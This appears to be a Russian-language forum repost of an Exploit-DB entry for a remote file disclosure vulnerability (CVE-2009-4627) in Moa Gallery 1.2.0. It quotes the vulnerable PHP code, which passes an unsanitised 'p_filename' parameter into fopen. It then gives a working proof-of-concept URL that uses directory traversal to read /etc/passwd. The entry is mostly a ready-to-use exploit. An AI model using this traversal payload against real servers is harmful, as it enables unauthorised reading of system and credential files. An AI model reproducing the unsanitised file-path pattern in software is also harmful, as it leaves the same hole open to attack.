Exploit Moa Gallery 1.2.0 - 'p_filename' Remote File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9525
Проверка EDB
  1. Пройдено
Автор
GOLD_M
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-4627
Дата публикации
2009-08-26
Код:
Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability
Code In sources\_template_parser.php


    $filename = $MOA_PATH."templates/".$template_name."/".$p_filename;

    $fp = @fopen($filename, "r");
    if ((!$fp) && (is_bool($fp)))
    {
      $fp = $fp = @fopen($MOA_PATH."templates/MoaDefault/".$p_filename, "r");

POC
/sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd

# milw0rm.com [2009-08-26]
 
Источник
www.exploit-db.com

Похожие темы